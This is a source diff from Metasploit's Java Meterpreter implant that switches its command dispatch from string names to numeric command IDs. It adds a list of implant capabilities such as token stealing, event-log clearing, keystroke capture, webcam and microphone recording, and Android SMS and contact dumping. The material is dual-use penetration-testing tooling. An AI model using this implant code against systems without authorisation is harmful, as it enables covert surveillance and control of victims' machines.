             TLVPacket tlv = new TLVPacket();
             tlv.add(TLVType.TLV_TYPE_CHANNEL_ID, getID());
-            String method;
+            int commandId;
             if (toRead == null) {
-                method = "core_channel_close";
+                commandId = CommandId.CORE_CHANNEL_CLOSE;
                 close();
             } else {
-                method = "core_channel_write";
+                commandId = CommandId.CORE_CHANNEL_WRITE;
                 tlv.add(TLVType.TLV_TYPE_CHANNEL_DATA, toRead);
                 tlv.add(TLVType.TLV_TYPE_LENGTH, toRead.length);
             }
-            meterpreter.writeRequestPacket(method, tlv);
+            meterpreter.writeRequestPacket(commandId, tlv);
         }
         waiting = false;
         notifyAll();

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/CommandManager.java

@@ -17,8 +17,8 @@ import com.metasploit.meterpreter.command.UnsupportedJavaVersionCommand;
 public class CommandManager {
 
     private final int javaVersion;
-    private Map/* <String,Command> */registeredCommands = new HashMap();
+    private Map/* <int,Command> */registeredCommands = new HashMap();
-    private Vector/* <String> */newCommands = new Vector();
+    private Vector/* <int> */newCommands = new Vector();
 
     protected CommandManager() throws Exception {
         // get the API version, which might be different from the
@@ -54,39 +54,39 @@ public class CommandManager {
     /**
      * Register a command that can be executed on all Java versions (from 1.2 onward)
      *
-     * @param command      Name of the command
+     * @param commandId    ID of the command
      * @param commandClass Class that implements the command
      */
-    public void registerCommand(String command, Class commandClass) throws Exception {
+    public void registerCommand(int commandId, Class commandClass) throws Exception {
-        registerCommand(command, commandClass, ExtensionLoader.V1_2);
+        registerCommand(commandId, commandClass, ExtensionLoader.V1_2);
     }
 
     /**
      * Register a command that can be executed only on some Java versions
      *
-     * @param command      Name of the command
+     * @param commandId    ID of the command
      * @param commandClass Stub class for generating the class name that implements the command
      * @param version      Minimum Java version
      */
-    public void registerCommand(String command, Class commandClass, int version) throws Exception {
+    public void registerCommand(int commandId, Class commandClass, int version) throws Exception {
-        registerCommand(command, commandClass, version, version);
+        registerCommand(commandId, commandClass, version, version);
     }
 
     /**
      * Register a command that can be executed only on some Java versions, and has two different implementations for different Java versions.
      *
-     * @param command       Name of the command
+     * @param commandId     ID of the command
      * @param commandClass  Stub class for generating the class name that implements the command
      * @param version       Minimum Java version
      * @param secondVersion Minimum Java version for the second implementation
      */
-    public void registerCommand(String command, Class commandClass, int version, int secondVersion) throws Exception {
+    public void registerCommand(int commandId, Class commandClass, int version, int secondVersion) throws Exception {
         if (secondVersion < version) {
             throw new IllegalArgumentException("secondVersion must be larger than version");
         }
 
         if (javaVersion < version) {
-            registeredCommands.put(command, new UnsupportedJavaVersionCommand(command, version));
+            registeredCommands.put(commandId, new UnsupportedJavaVersionCommand(commandId, version));
             return;
         }
 
@@ -99,26 +99,41 @@ public class CommandManager {
         }
 
         Command cmd = (Command) commandClass.newInstance();
-        registeredCommands.put(command, cmd);
+        registeredCommands.put(commandId, cmd);
-        Command x = (Command)registeredCommands.get(command);
+        Command x = (Command)registeredCommands.get(commandId);
 
-        newCommands.add(command);
+        newCommands.add(commandId);
     }
 
     /**
-     * Get a command for the given name.
+     * Get a command for the given ID.
      */
-    public Command getCommand(String name) {
+    public Command getCommand(int commandId) {
-        Command cmd = (Command) registeredCommands.get(name);
+        Command cmd = (Command) registeredCommands.get(commandId);
         if (cmd == null) {
             cmd = NotYetImplementedCommand.INSTANCE;
         }
         return cmd;
     }
 
+    /**
+     * Get a list of commands registered against a specific extension
+     */
+    public Integer[] getCommandsInRange(Integer start, Integer end) {
+        Vector commandIds = new Vector();
+        for (Object key : registeredCommands.keySet()) {
+            Integer commandId = (Integer)key;
+            if (start < commandId && commandId < end) {
+                commandIds.add(commandId);
+            }
+        }
+        Integer[] result = new Integer[commandIds.size()];
+        return (Integer[])commandIds.toArray(result);
+    }
+
     public int executeCommand(Meterpreter met, TLVPacket request, TLVPacket response) throws IOException {
-        String method = request.getStringValue(TLVType.TLV_TYPE_METHOD);
+        int commandId = request.getIntValue(TLVType.TLV_TYPE_COMMAND_ID);
-        Command cmd = this.getCommand(method);
+        Command cmd = this.getCommand(commandId);
 
         int result;
         try {
@@ -145,16 +160,16 @@ public class CommandManager {
     }
 
     /**
-     * Retrieves the list of commands loaded by the last core_loadlib call
+     * Retrieves the list of command IDs loaded by the last core_loadlib call
      */
-    public String[] getNewCommands() {
+    public Integer[] getNewCommandIds() {
-        return (String[]) newCommands.toArray(new String[newCommands.size()]);
+        return (Integer[]) newCommands.toArray(new Integer[newCommands.size()]);
     }
 
     /**
-     * Retrieves the list of commands
+     * Retrieves the list of command IDs
      */
-    public String[] getCommands() {
+    public Integer[] getCommandsIds() {
-        return (String[]) registeredCommands.keySet().toArray(new String[registeredCommands.size()]);
+        return (Integer[]) registeredCommands.keySet().toArray(new Integer[registeredCommands.size()]);
     }
 }

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java

@@ -274,11 +274,11 @@ public class Meterpreter {
     /**
      * Send a request packet over this meterpreter.
      *
-     * @param method Method to invoke
+     * @param commandId ID of the associated command
      * @param tlv Packet parameters
      */
-    public void writeRequestPacket(String method, TLVPacket tlv) throws IOException {
+    public void writeRequestPacket(int commandId, TLVPacket tlv) throws IOException {
-        tlv.add(TLVType.TLV_TYPE_METHOD, method);
+        tlv.add(TLVType.TLV_TYPE_COMMAND_ID, commandId);
         char[] requestID = new char[32];
         for (int i = 0; i < requestID.length; i++) {
             requestID[i] = (char) ('A' + rnd.nextInt(26));
@@ -292,7 +292,7 @@ public class Meterpreter {
      *
      * @param data The extension jar's content as a byte array
      */
-    public String[] loadExtension(byte[] data) throws Exception {
+    public Integer[] loadExtension(byte[] data) throws Exception {
         ClassLoader classLoader = getClass().getClassLoader();
         if (loadExtensions) {
             URL url = MemoryBufferURLConnection.createURL(data, "application/jar");
@@ -303,6 +303,6 @@ public class Meterpreter {
         ExtensionLoader loader = (ExtensionLoader) classLoader.loadClass(loaderName).newInstance();
         commandManager.resetNewCommands();
         loader.load(commandManager);
-        return commandManager.getNewCommands();
+        return commandManager.getNewCommandIds();
     }
 }

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVPacket.java

@@ -269,7 +269,7 @@ public class TLVPacket {
 
     public TLVPacket createResponse() throws IOException {
         TLVPacket response = new TLVPacket();
-        response.add(TLVType.TLV_TYPE_METHOD, this.getStringValue(TLVType.TLV_TYPE_METHOD));
+        response.add(TLVType.TLV_TYPE_COMMAND_ID, this.getIntValue(TLVType.TLV_TYPE_COMMAND_ID));
         response.add(TLVType.TLV_TYPE_REQUEST_ID, this.getStringValue(TLVType.TLV_TYPE_REQUEST_ID, null));
         return response;
     }

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java

@@ -11,7 +11,7 @@ public interface TLVType {
 
     // TLV Specific Types
     public static final int TLV_TYPE_ANY        = TLVPacket.TLV_META_TYPE_NONE   | 0;
-    public static final int TLV_TYPE_METHOD     = TLVPacket.TLV_META_TYPE_STRING | 1;
+    public static final int TLV_TYPE_COMMAND_ID = TLVPacket.TLV_META_TYPE_UINT   | 1;
     public static final int TLV_TYPE_REQUEST_ID = TLVPacket.TLV_META_TYPE_STRING | 2;
     public static final int TLV_TYPE_EXCEPTION  = TLVPacket.TLV_META_TYPE_GROUP  | 3;
     public static final int TLV_TYPE_RESULT     = TLVPacket.TLV_META_TYPE_UINT   | 4;

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/CommandId.java

@@ -0,0 +1,187 @@
+package com.metasploit.meterpreter.command;
+
+/**
+ * All supported Command Identifiers
+ *
+ * @author Genereated by a tool @ 2020-05-01 05:25:30 UTC
+ */
+public interface CommandId {
+    public static final int CORE_CHANNEL_CLOSE = 1;
+    public static final int CORE_CHANNEL_EOF = 2;
+    public static final int CORE_CHANNEL_INTERACT = 3;
+    public static final int CORE_CHANNEL_OPEN = 4;
+    public static final int CORE_CHANNEL_READ = 5;
+    public static final int CORE_CHANNEL_SEEK = 6;
+    public static final int CORE_CHANNEL_TELL = 7;
+    public static final int CORE_CHANNEL_WRITE = 8;
+    public static final int CORE_CONSOLE_WRITE = 9;
+    public static final int CORE_ENUMEXTCMD = 10;
+    public static final int CORE_GET_SESSION_GUID = 11;
+    public static final int CORE_LOADLIB = 12;
+    public static final int CORE_MACHINE_ID = 13;
+    public static final int CORE_MIGRATE = 14;
+    public static final int CORE_NATIVE_ARCH = 15;
+    public static final int CORE_NEGOTIATE_TLV_ENCRYPTION = 16;
+    public static final int CORE_PATCH_URL = 17;
+    public static final int CORE_PIVOT_ADD = 18;
+    public static final int CORE_PIVOT_REMOVE = 19;
+    public static final int CORE_PIVOT_SESSION_DIED = 20;
+    public static final int CORE_SET_SESSION_GUID = 21;
+    public static final int CORE_SET_UUID = 22;
+    public static final int CORE_SHUTDOWN = 23;
+    public static final int CORE_TRANSPORT_ADD = 24;
+    public static final int CORE_TRANSPORT_CHANGE = 25;
+    public static final int CORE_TRANSPORT_GETCERTHASH = 26;
+    public static final int CORE_TRANSPORT_LIST = 27;
+    public static final int CORE_TRANSPORT_NEXT = 28;
+    public static final int CORE_TRANSPORT_PREV = 29;
+    public static final int CORE_TRANSPORT_REMOVE = 30;
+    public static final int CORE_TRANSPORT_SETCERTHASH = 31;
+    public static final int CORE_TRANSPORT_SET_TIMEOUTS = 32;
+    public static final int CORE_TRANSPORT_SLEEP = 33;
+    public static final int STDAPI_FS_CHDIR = 1001;
+    public static final int STDAPI_FS_CHMOD = 1002;
+    public static final int STDAPI_FS_DELETE_DIR = 1003;
+    public static final int STDAPI_FS_DELETE_FILE = 1004;
+    public static final int STDAPI_FS_FILE_COPY = 1005;
+    public static final int STDAPI_FS_FILE_EXPAND_PATH = 1006;
+    public static final int STDAPI_FS_FILE_MOVE = 1007;
+    public static final int STDAPI_FS_GETWD = 1008;
+    public static final int STDAPI_FS_LS = 1009;
+    public static final int STDAPI_FS_MD5 = 1010;
+    public static final int STDAPI_FS_MKDIR = 1011;
+    public static final int STDAPI_FS_MOUNT_SHOW = 1012;
+    public static final int STDAPI_FS_SEARCH = 1013;
+    public static final int STDAPI_FS_SEPARATOR = 1014;
+    public static final int STDAPI_FS_SHA1 = 1015;
+    public static final int STDAPI_FS_STAT = 1016;
+    public static final int STDAPI_NET_CONFIG_ADD_ROUTE = 1017;
+    public static final int STDAPI_NET_CONFIG_GET_ARP_TABLE = 1018;
+    public static final int STDAPI_NET_CONFIG_GET_INTERFACES = 1019;
+    public static final int STDAPI_NET_CONFIG_GET_NETSTAT = 1020;
+    public static final int STDAPI_NET_CONFIG_GET_PROXY = 1021;
+    public static final int STDAPI_NET_CONFIG_GET_ROUTES = 1022;
+    public static final int STDAPI_NET_CONFIG_REMOVE_ROUTE = 1023;
+    public static final int STDAPI_NET_RESOLVE_HOST = 1024;
+    public static final int STDAPI_NET_RESOLVE_HOSTS = 1025;
+    public static final int STDAPI_NET_SOCKET_TCP_SHUTDOWN = 1026;
+    public static final int STDAPI_NET_TCP_CHANNEL_OPEN = 1027;
+    public static final int STDAPI_RAILGUN_API = 1028;
+    public static final int STDAPI_RAILGUN_API_MULTI = 1029;
+    public static final int STDAPI_RAILGUN_MEMREAD = 1030;
+    public static final int STDAPI_RAILGUN_MEMWRITE = 1031;
+    public static final int STDAPI_REGISTRY_CHECK_KEY_EXISTS = 1032;
+    public static final int STDAPI_REGISTRY_CLOSE_KEY = 1033;
+    public static final int STDAPI_REGISTRY_CREATE_KEY = 1034;
+    public static final int STDAPI_REGISTRY_DELETE_KEY = 1035;
+    public static final int STDAPI_REGISTRY_DELETE_VALUE = 1036;
+    public static final int STDAPI_REGISTRY_ENUM_KEY = 1037;
+    public static final int STDAPI_REGISTRY_ENUM_KEY_DIRECT = 1038;
+    public static final int STDAPI_REGISTRY_ENUM_VALUE = 1039;
+    public static final int STDAPI_REGISTRY_ENUM_VALUE_DIRECT = 1040;
+    public static final int STDAPI_REGISTRY_LOAD_KEY = 1041;
+    public static final int STDAPI_REGISTRY_OPEN_KEY = 1042;
+    public static final int STDAPI_REGISTRY_OPEN_REMOTE_KEY = 1043;
+    public static final int STDAPI_REGISTRY_QUERY_CLASS = 1044;
+    public static final int STDAPI_REGISTRY_QUERY_VALUE = 1045;
+    public static final int STDAPI_REGISTRY_QUERY_VALUE_DIRECT = 1046;
+    public static final int STDAPI_REGISTRY_SET_VALUE = 1047;
+    public static final int STDAPI_REGISTRY_SET_VALUE_DIRECT = 1048;
+    public static final int STDAPI_REGISTRY_UNLOAD_KEY = 1049;
+    public static final int STDAPI_SYS_CONFIG_DRIVER_LIST = 1050;
+    public static final int STDAPI_SYS_CONFIG_DROP_TOKEN = 1051;
+    public static final int STDAPI_SYS_CONFIG_GETENV = 1052;
+    public static final int STDAPI_SYS_CONFIG_GETPRIVS = 1053;
+    public static final int STDAPI_SYS_CONFIG_GETSID = 1054;
+    public static final int STDAPI_SYS_CONFIG_GETUID = 1055;
+    public static final int STDAPI_SYS_CONFIG_LOCALTIME = 1056;
+    public static final int STDAPI_SYS_CONFIG_REV2SELF = 1057;
+    public static final int STDAPI_SYS_CONFIG_STEAL_TOKEN = 1058;
+    public static final int STDAPI_SYS_CONFIG_SYSINFO = 1059;
+    public static final int STDAPI_SYS_EVENTLOG_CLEAR = 1060;
+    public static final int STDAPI_SYS_EVENTLOG_CLOSE = 1061;
+    public static final int STDAPI_SYS_EVENTLOG_NUMRECORDS = 1062;
+    public static final int STDAPI_SYS_EVENTLOG_OLDEST = 1063;
+    public static final int STDAPI_SYS_EVENTLOG_OPEN = 1064;
+    public static final int STDAPI_SYS_EVENTLOG_READ = 1065;
+    public static final int STDAPI_SYS_POWER_EXITWINDOWS = 1066;
+    public static final int STDAPI_SYS_PROCESS_ATTACH = 1067;
+    public static final int STDAPI_SYS_PROCESS_CLOSE = 1068;
+    public static final int STDAPI_SYS_PROCESS_EXECUTE = 1069;
+    public static final int STDAPI_SYS_PROCESS_GET_INFO = 1070;
+    public static final int STDAPI_SYS_PROCESS_GET_PROCESSES = 1071;
+    public static final int STDAPI_SYS_PROCESS_GETPID = 1072;
+    public static final int STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES = 1073;
+    public static final int STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = 1074;
+    public static final int STDAPI_SYS_PROCESS_IMAGE_LOAD = 1075;
+    public static final int STDAPI_SYS_PROCESS_IMAGE_UNLOAD = 1076;
+    public static final int STDAPI_SYS_PROCESS_KILL = 1077;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_ALLOCATE = 1078;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_FREE = 1079;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_LOCK = 1080;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_PROTECT = 1081;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_QUERY = 1082;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_READ = 1083;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_UNLOCK = 1084;
+    public static final int STDAPI_SYS_PROCESS_MEMORY_WRITE = 1085;
+    public static final int STDAPI_SYS_PROCESS_THREAD_CLOSE = 1086;
+    public static final int STDAPI_SYS_PROCESS_THREAD_CREATE = 1087;
+    public static final int STDAPI_SYS_PROCESS_THREAD_GET_THREADS = 1088;
+    public static final int STDAPI_SYS_PROCESS_THREAD_OPEN = 1089;
+    public static final int STDAPI_SYS_PROCESS_THREAD_QUERY_REGS = 1090;
+    public static final int STDAPI_SYS_PROCESS_THREAD_RESUME = 1091;
+    public static final int STDAPI_SYS_PROCESS_THREAD_SET_REGS = 1092;
+    public static final int STDAPI_SYS_PROCESS_THREAD_SUSPEND = 1093;
+    public static final int STDAPI_SYS_PROCESS_THREAD_TERMINATE = 1094;
+    public static final int STDAPI_SYS_PROCESS_WAIT = 1095;
+    public static final int STDAPI_UI_DESKTOP_ENUM = 1096;
+    public static final int STDAPI_UI_DESKTOP_GET = 1097;
+    public static final int STDAPI_UI_DESKTOP_SCREENSHOT = 1098;
+    public static final int STDAPI_UI_DESKTOP_SET = 1099;
+    public static final int STDAPI_UI_ENABLE_KEYBOARD = 1100;
+    public static final int STDAPI_UI_ENABLE_MOUSE = 1101;
+    public static final int STDAPI_UI_GET_IDLE_TIME = 1102;
+    public static final int STDAPI_UI_GET_KEYS_UTF8 = 1103;
+    public static final int STDAPI_UI_SEND_KEYEVENT = 1104;
+    public static final int STDAPI_UI_SEND_KEYS = 1105;
+    public static final int STDAPI_UI_SEND_MOUSE = 1106;
+    public static final int STDAPI_UI_START_KEYSCAN = 1107;
+    public static final int STDAPI_UI_STOP_KEYSCAN = 1108;
+    public static final int STDAPI_UI_UNLOCK_DESKTOP = 1109;
+    public static final int STDAPI_WEBCAM_AUDIO_RECORD = 1110;
+    public static final int STDAPI_WEBCAM_GET_FRAME = 1111;
+    public static final int STDAPI_WEBCAM_LIST = 1112;
+    public static final int STDAPI_WEBCAM_START = 1113;
+    public static final int STDAPI_WEBCAM_STOP = 1114;
+    public static final int STDAPI_AUDIO_MIC_START = 1115;
+    public static final int STDAPI_AUDIO_MIC_STOP = 1116;
+    public static final int STDAPI_AUDIO_MIC_LIST = 1117;
+    public static final int APPAPI_APP_INSTALL = 9001;
+    public static final int APPAPI_APP_LIST = 9002;
+    public static final int APPAPI_APP_RUN = 9003;
+    public static final int APPAPI_APP_UNINSTALL = 9004;
+    public static final int EXTAPI_CLIPBOARD_GET_DATA = 3002;
+    public static final int EXTAPI_CLIPBOARD_MONITOR_DUMP = 3003;
+    public static final int EXTAPI_CLIPBOARD_MONITOR_PAUSE = 3004;
+    public static final int EXTAPI_CLIPBOARD_MONITOR_PURGE = 3005;
+    public static final int EXTAPI_CLIPBOARD_MONITOR_RESUME = 3006;
+    public static final int EXTAPI_CLIPBOARD_MONITOR_START = 3007;
+    public static final int EXTAPI_CLIPBOARD_MONITOR_STOP = 3008;
+    public static final int EXTAPI_CLIPBOARD_SET_DATA = 3009;
+    public static final int ANDROID_ACTIVITY_START = 5001;
+    public static final int ANDROID_CHECK_ROOT = 5002;
+    public static final int ANDROID_DEVICE_SHUTDOWN = 5003;
+    public static final int ANDROID_DUMP_CALLLOG = 5004;
+    public static final int ANDROID_DUMP_CONTACTS = 5005;
+    public static final int ANDROID_DUMP_SMS = 5006;
+    public static final int ANDROID_GEOLOCATE = 5007;
+    public static final int ANDROID_HIDE_APP_ICON = 5008;
+    public static final int ANDROID_INTERVAL_COLLECT = 5009;
+    public static final int ANDROID_SEND_SMS = 5010;
+    public static final int ANDROID_SET_AUDIO_MODE = 5011;
+    public static final int ANDROID_SET_WALLPAPER = 5012;
+    public static final int ANDROID_SQLITE_QUERY = 5013;
+    public static final int ANDROID_WAKELOCK = 5014;
+    public static final int ANDROID_WLAN_GEOLOCATE = 5015;
+}
+

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/NotYetImplementedCommand.java

@@ -22,7 +22,7 @@ public class NotYetImplementedCommand implements Command {
 
     private NotYetImplementedCommand() {
         typeNames.put(new Integer(TLVType.TLV_TYPE_ANY), "TLV_TYPE_ANY");
-        typeNames.put(new Integer(TLVType.TLV_TYPE_METHOD), "TLV_TYPE_METHOD");
+        typeNames.put(new Integer(TLVType.TLV_TYPE_COMMAND_ID), "TLV_TYPE_COMMAND_ID");
         typeNames.put(new Integer(TLVType.TLV_TYPE_REQUEST_ID), "TLV_TYPE_REQUEST_ID");
         typeNames.put(new Integer(TLVType.TLV_TYPE_EXCEPTION), "TLV_TYPE_EXCEPTION");
         typeNames.put(new Integer(TLVType.TLV_TYPE_RESULT), "TLV_TYPE_RESULT");

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/UnsupportedJavaVersionCommand.java

@@ -11,16 +11,16 @@ import com.metasploit.meterpreter.TLVPacket;
  */
 public class UnsupportedJavaVersionCommand implements Command {
 
-    private final String command;
+    private final int command;
     private final int version;
 
     /**
      * Create a new instance of that command.
      *
-     * @param command Name of the command
+     * @param command ID of the command
      * @param version Version required
      */
-    public UnsupportedJavaVersionCommand(String command, int version) {
+    public UnsupportedJavaVersionCommand(int command, int version) {
         this.command = command;
         this.version = version;
     }

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java

@@ -1,6 +1,7 @@
 package com.metasploit.meterpreter.core;
 
 import com.metasploit.meterpreter.CommandManager;
+import com.metasploit.meterpreter.command.CommandId;
 import com.metasploit.meterpreter.ExtensionLoader;
 
 /**
@@ -11,27 +12,26 @@ import com.metasploit.meterpreter.ExtensionLoader;
 public class Loader implements ExtensionLoader {
 
     public void load(CommandManager mgr) throws Exception {
-        mgr.registerCommand("core_channel_close", core_channel_close.class);
+        mgr.registerCommand(CommandId.CORE_CHANNEL_CLOSE, core_channel_close.class);
-        mgr.registerCommand("core_channel_eof", core_channel_eof.class);
+        mgr.registerCommand(CommandId.CORE_CHANNEL_EOF, core_channel_eof.class);
-        mgr.registerCommand("core_channel_interact", core_channel_interact.class);
+        mgr.registerCommand(CommandId.CORE_CHANNEL_INTERACT, core_channel_interact.class);
-        mgr.registerCommand("core_channel_open", core_channel_open.class);
+        mgr.registerCommand(CommandId.CORE_CHANNEL_READ, core_channel_read.class);
-        mgr.registerCommand("core_channel_read", core_channel_read.class);
+        mgr.registerCommand(CommandId.CORE_CHANNEL_WRITE, core_channel_write.class);
-        mgr.registerCommand("core_channel_write", core_channel_write.class);
+        mgr.registerCommand(CommandId.CORE_ENUMEXTCMD, core_enumextcmd.class);
-        mgr.registerCommand("core_enumextcmd", core_enumextcmd.class);
+        mgr.registerCommand(CommandId.CORE_LOADLIB, core_loadlib.class);
-        mgr.registerCommand("core_loadlib", core_loadlib.class);
+        mgr.registerCommand(CommandId.CORE_SET_UUID, core_set_uuid.class);
-        mgr.registerCommand("core_set_uuid", core_set_uuid.class);
+        mgr.registerCommand(CommandId.CORE_MACHINE_ID, core_machine_id.class);
-        mgr.registerCommand("core_machine_id", core_machine_id.class);
+        mgr.registerCommand(CommandId.CORE_GET_SESSION_GUID, core_get_session_guid.class);
-        mgr.registerCommand("core_get_session_guid", core_get_session_guid.class);
+        mgr.registerCommand(CommandId.CORE_SET_SESSION_GUID, core_set_session_guid.class);
-        mgr.registerCommand("core_set_session_guid", core_set_session_guid.class);
+        mgr.registerCommand(CommandId.CORE_PATCH_URL, core_patch_url.class);
-        mgr.registerCommand("core_patch_url", core_patch_url.class);
+        mgr.registerCommand(CommandId.CORE_SHUTDOWN, core_shutdown.class);
-        mgr.registerCommand("core_shutdown", core_shutdown.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_SET_TIMEOUTS, core_transport_set_timeouts.class);
-        mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_LIST, core_transport_list.class);
-        mgr.registerCommand("core_transport_list", core_transport_list.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_ADD, core_transport_add.class);
-        mgr.registerCommand("core_transport_add", core_transport_add.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_CHANGE, core_transport_change.class);
-        mgr.registerCommand("core_transport_change", core_transport_change.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_SLEEP, core_transport_sleep.class);
-        mgr.registerCommand("core_transport_sleep", core_transport_sleep.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_NEXT, core_transport_next.class);
-        mgr.registerCommand("core_transport_next", core_transport_next.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_PREV, core_transport_prev.class);
-        mgr.registerCommand("core_transport_prev", core_transport_prev.class);
+        mgr.registerCommand(CommandId.CORE_TRANSPORT_REMOVE, core_transport_remove.class);
-        mgr.registerCommand("core_transport_remove", core_transport_remove.class);
     }
 }

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_channel_open.java

@@ -1,15 +0,0 @@
-package com.metasploit.meterpreter.core;
-
-import com.metasploit.meterpreter.Meterpreter;
-import com.metasploit.meterpreter.TLVPacket;
-import com.metasploit.meterpreter.TLVType;
-import com.metasploit.meterpreter.command.Command;
-
-public class core_channel_open implements Command {
-
-    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        String channelType = request.getStringValue(TLVType.TLV_TYPE_CHANNEL_TYPE);
-        Command channelCreator = meterpreter.getCommandManager().getCommand("channel_create_" + channelType);
-        return channelCreator.execute(meterpreter, request, response);
-    }
-}

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_enumextcmd.java

@@ -9,17 +9,12 @@ import com.metasploit.meterpreter.command.Command;
 public class core_enumextcmd implements Command {
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        String extension = request.getStringValue(TLVType.TLV_TYPE_STRING);
+        Integer start = request.getIntValue(TLVType.TLV_TYPE_UINT);
+        Integer end = request.getIntValue(TLVType.TLV_TYPE_LENGTH) + start;
         CommandManager commandManager = meterpreter.getCommandManager();
-        String[] commands = commandManager.getCommands();
+        Integer[] commands = commandManager.getCommandsInRange(start, end);
-        for (String command : commands) {
+        for (Integer commandId : commands) {
-            String prefix = command.split("_")[0];
+            response.addOverflow(TLVType.TLV_TYPE_UINT, commandId);
-            if ("webcam".equals(prefix)) {
-                prefix = "stdapi";
-            }
-            if (extension.equals(prefix)) {
-                response.addOverflow(TLVType.TLV_TYPE_STRING, command);
-            }
         }
         return ERROR_SUCCESS;
     }

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_loadlib.java

@@ -22,9 +22,9 @@ public class core_loadlib implements Command {
             return ERROR_SUCCESS;
         }
 
-        String[] commands = meterpreter.loadExtension(data);
+        Integer[] commands = meterpreter.loadExtension(data);
         for (int i = 0; i < commands.length; i++) {
-            response.addOverflow(TLVType.TLV_TYPE_METHOD, commands[i]);
+            response.addOverflow(TLVType.TLV_TYPE_UINT, commands[i]);
         }
         return ERROR_SUCCESS;
     }

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/DatagramSocketChannel.java

@@ -7,6 +7,8 @@ import java.net.DatagramSocket;
 import java.net.InetAddress;
 import java.net.SocketException;
 
+import com.metasploit.meterpreter.command.CommandId;
+
 /**
  * A channel for a {@link DatagramSocket}.
  *
@@ -75,7 +77,7 @@ public class DatagramSocketChannel extends Channel {
                         tlv.add(TLVType.TLV_TYPE_PEER_PORT, dp.getPort());
                         tlv.add(TLVType.TLV_TYPE_CHANNEL_DATA, data);
                         tlv.add(TLVType.TLV_TYPE_LENGTH, data.length);
-                        getMeterpreter().writeRequestPacket("core_channel_write", tlv);
+                        getMeterpreter().writeRequestPacket(CommandId.CORE_CHANNEL_WRITE, tlv);
                     } catch (SocketException t) {
                         // dirty hack since later java versions add more of those...
                         if (!t.getClass().getName().endsWith("UnreachableException"))

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/ProcessChannel.java

@@ -2,6 +2,7 @@ package com.metasploit.meterpreter;
 
 import java.io.IOException;
 import java.io.InputStream;
+import java.io.PrintStream;
 
 /**
  * A channel for a started {@link Process}.
@@ -23,7 +24,7 @@ public class ProcessChannel extends Channel {
         super(meterpreter, process.getInputStream(), process.getOutputStream());
         this.process = process;
         this.err = process.getErrorStream();
-        new StderrThread(err).start();
+        new StderrThread(err, meterpreter.getErrorStream()).start();
     }
 
     /**
@@ -52,17 +53,19 @@ public class ProcessChannel extends Channel {
     }
 
     class StderrThread extends Thread {
-        private final InputStream stream;
+        private final InputStream inputStream;
+        private final PrintStream outputStream;
 
-        public StderrThread(InputStream stream) {
+        public StderrThread(InputStream inputStream, PrintStream outputStream) {
-            this.stream = stream;
+            this.inputStream = inputStream;
+            this.outputStream = outputStream;
         }
 
         public void run() {
             try {
                 byte[] buffer = new byte[1024*1024];
                 int len;
-                while ((len = stream.read(buffer)) != -1) {
+                while ((len = inputStream.read(buffer)) != -1) {
                     if (len == 0)
                         continue;
                     byte[] data = new byte[len];
@@ -70,7 +73,7 @@ public class ProcessChannel extends Channel {
                     handleInteract(data);
                 }
             } catch (Throwable t) {
-                t.printStackTrace(meterpreter.getErrorStream());
+                t.printStackTrace(this.outputStream);
             }
         }
     }

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/ServerSocketChannel.java

@@ -6,6 +6,8 @@ import java.net.ServerSocket;
 import java.net.Socket;
 import java.net.SocketException;
 
+import com.metasploit.meterpreter.command.CommandId;
+
 /**
  * A channel for a {@link ServerSocket}.
  *
@@ -52,7 +54,7 @@ public class ServerSocketChannel extends Channel {
                     packet.add(TLVType.TLV_TYPE_LOCAL_PORT, s.getLocalPort());
                     packet.add(TLVType.TLV_TYPE_PEER_HOST, s.getInetAddress().getHostAddress());
                     packet.add(TLVType.TLV_TYPE_PEER_PORT, s.getPort());
-                    getMeterpreter().writeRequestPacket("tcp_channel_open", packet);
+                    getMeterpreter().writeRequestPacket(CommandId.STDAPI_NET_TCP_CHANNEL_OPEN, packet);
                     ch.startInteract();
                 }
             } catch (SocketException t) {

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java

@@ -3,6 +3,7 @@ package com.metasploit.meterpreter.stdapi;
 import java.io.File;
 
 import com.metasploit.meterpreter.CommandManager;
+import com.metasploit.meterpreter.command.CommandId;
 import com.metasploit.meterpreter.ExtensionLoader;
 
 /**
@@ -12,48 +13,61 @@ import com.metasploit.meterpreter.ExtensionLoader;
  */
 public class Loader implements ExtensionLoader {
 
-    public static File cwd;
+    private static File cwd;
+
+    public static File getCWD() {
+        if (null == cwd) {
+            try {
+                cwd = new File(".").getCanonicalFile();
+            }
+            catch (Exception e) {
+                cwd = null;
+            }
+        }
+        return cwd;
+    }
 
